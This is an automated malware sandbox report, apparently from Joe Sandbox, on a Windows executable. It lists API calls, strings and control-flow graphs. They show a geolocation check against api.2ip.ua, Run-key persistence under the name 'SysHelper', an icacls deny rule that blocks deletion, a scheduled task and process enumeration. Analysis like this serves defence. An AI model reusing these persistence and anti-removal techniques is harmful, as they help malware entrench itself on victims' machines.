42019c 44964->44991 44966 4227d4 44999 425208 58 API calls __getptd_noexit 44966->44999 44969 4227d9 45000 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44969->45000 44970 4227e9 MultiByteToWideChar 44973 422804 GetLastError 44970->44973 44974 422815 44970->44974 44972 40d7a3 44972->44600 45001 4251e7 58 API calls 2 library calls 44973->45001 45002 428cde 58 API calls 2 library calls 44974->45002 44977 42281d 44978 422810 44977->44978 44979 422825 MultiByteToWideChar 44977->44979 45006 420bed 58 API calls 2 library calls 44978->45006 44979->44973 44980 42283f 44979->44980 45003 428cde 58 API calls 2 library calls 44980->45003 44983 4228a0 45007 420bed 58 API calls 2 library calls 44983->45007 44985 42284a 44985->44978 45004 42d51e 88 API calls 3 library calls 44985->45004 44987 422866 44987->44978 44988 42286f WideCharToMultiByte 44987->44988 44988->44978 44989 42288b GetLastError 44988->44989 45005 4251e7 58 API calls 2 library calls 44989->45005 44992 4201ad 44991->44992 44996 4201fa 44991->44996 45008 425007 58 API calls 2 library calls 44992->45008 44994 4201b3 44995 4201da 44994->44995 45009 4245dc 58 API calls 6 library calls 44994->45009 44995->44996 45010 42495e 58 API calls 6 library calls 44995->45010 44996->44966 44996->44970 44999->44969 45000->44972 45001->44978 45002->44977 45003->44985 45004->44987 45005->44978 45006->44983 45007->44972 45008->44994 45009->44995 45010->44996 45011->44639 45012->44639 45021 427ad7 GetModuleHandleExW 45013->45021 45016->44638 45017->44644 45018->44646 45019->44633 45020->44646 45022 427af0 GetProcAddress 45021->45022 45023 427b07 ExitProcess 45021->45023 45022->45023 45024 427b02 45022->45024 45024->45023 45025->44658 45032 427e1a __wsopen_helper 45031->45032 45033 428af7 __lock 51 API calls 45032->45033 45034 427e21 45033->45034 45035 427eda _doexit 45034->45035 45036 427e4f DecodePointer 45034->45036 45051 427f28 45035->45051 45036->45035 45038 427e66 DecodePointer 45036->45038 45045 427e76 45038->45045 
45040 427f37 __wsopen_helper 45040->44348 45042 427f1f 45044 427b0b __lockerr_exit 3 API calls 45042->45044 45043 427e83 EncodePointer 45043->45045 45047 427f28 45044->45047 45045->45035 45045->45043 45046 427e93 DecodePointer EncodePointer 45045->45046 45049 427ea5 DecodePointer DecodePointer 45046->45049 45048 427f35 45047->45048 45056 428c81 LeaveCriticalSection 45047->45056 45048->44348 45049->45045 45052 427f08 45051->45052 45053 427f2e 45051->45053 45052->45040 45055 428c81 LeaveCriticalSection 45052->45055 45057 428c81 LeaveCriticalSection 45053->45057 45055->45042 45056->45048 45057->45052
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                    • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                    • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                  • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                  • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                  • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,008BAC18,?), ref: 0041A0BB
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                  • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                    • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                    • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                    • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                  • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                  • API String ID: 2957410896-3144399390
                                                                                                  • Opcode ID: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                                                                                                  • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                  • Opcode Fuzzy Hash: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                                                                                                  • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                  • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                  • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                  • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                  • API String ID: 2496729271-1738591096
                                                                                                  • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                  • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                  • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                  • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                  • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                  • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                  • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                  • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                  • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                  • API String ID: 3668891214-3807497772
                                                                                                  • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                  • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                  • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                  • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 923 40d037 922->923 923->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 943 40d0cd-40d0e1 call 414300 935->943 944 40d0bf-40d0ca call 422587 935->944 940 40d093-40d09b call 422587 936->940 941 40d09e-40d0b4 call 413d40 936->941 938->912 939->938 940->941 941->935 943->928 954 40d0e7-40d149 call 413010 943->954 944->943 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 967 40d1a0 965->967 966->965 968 40d191-40d198 966->968 969 40d1a2-40d1a6 967->969 968->965 970 40d1c7-40d1c9 968->970 971 40d1b3-40d1c5 969->971 972 40d1a8-40d1b0 call 422587 969->972 970->969 971->931 972->971
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0040CF4A
                                                                                                  • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                  • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                  Strings
                                                                                                  • "country_code":", xrefs: 0040CFE1
                                                                                                  • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                  • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                  • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                  • API String ID: 1485416377-2962370585
                                                                                                  • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                  • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 623 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->623 624 411e89-411e91 call 422587 621->624 633 411f36-411f38 623->633 634 411f3a-411f3f 623->634 624->623 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 641 411e52-411e57 631->641 632->631 639 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->639 640 411f40-411f49 634->640 635->636 636->629 653 411f98-411fa0 639->653 654 411fce-411fe9 639->654 640->640 644 411f4b-411f4d 640->644 645 411e59-411e5e 641->645 646 411e6a-411e6e 641->646 644->639 645->646 649 411e60-411e65 call 414690 645->649 646->610 651 411e74-411e77 646->651 649->646 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 661 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->661 662 412000-412009 657->662 663 411fbf-411fc9 call 415c10 658->663 665 411fb0-411fb9 659->665 671 4121d1-4121d5 661->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 661->672 662->662 667 41200b-41200d 662->667 663->654 665->665 669 411fbb-411fbd 665->669 667->661 669->663 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 
680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                  • _memset.LIBCMT ref: 00411D3B
                                                                                                  • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                  • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                  • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                  • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                  • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                  • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                  • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                  • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                  • _memset.LIBCMT ref: 00412090
                                                                                                  • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                  • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                  • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                  • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                  • _memset.LIBCMT ref: 00412120
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                  • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                  • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                  • API String ID: 2589766509-1182136429
                                                                                                  • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                  • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 984 4235a0 976->984 977->976 983 4235c0-4235c3 977->983 985 4235d7-4235dd 983->985 986 4235c5 983->986 991 4235a2-4235a8 984->991 989 4235e9 call 42fb64 985->989 990 4235df 985->990 987 4235c7-4235c9 986->987 988 4235cb-4235d5 call 425208 986->988 987->985 987->988 988->984 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1039 42368f-423696 1033->1039 1039->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 004235B1
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                  • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                  • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                  • __allrem.LIBCMT ref: 004236F3
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                  • __allrem.LIBCMT ref: 00423726
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                  • __allrem.LIBCMT ref: 0042375B
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503770280-0
                                                                                                  • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                  • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1060 423b4c-423b52 1061 423b61-423b64 call 420c62 1060->1061 1063 423b69-423b6c 1061->1063 1064 423b54-423b5f call 42793d 1063->1064 1065 423b6e-423b71 1063->1065 1064->1061 1068 423b72-423bb2 call 430d21 call 430eca call 430d91 1064->1068 1075 423bb4-423bba call 422587 1068->1075 1076 423bbb-423bbf 1068->1076 1075->1076
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00423B64
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                  • String ID: bad allocation
                                                                                                  • API String ID: 3074076210-2104205924
                                                                                                  • Opcode ID: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                                                                                                  • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                  • Opcode Fuzzy Hash: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                                                                                                  • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1079 427b0b-427b1a call 427ad7 ExitProcess
                                                                                                  APIs
                                                                                                  • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                    • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                    • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                  • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
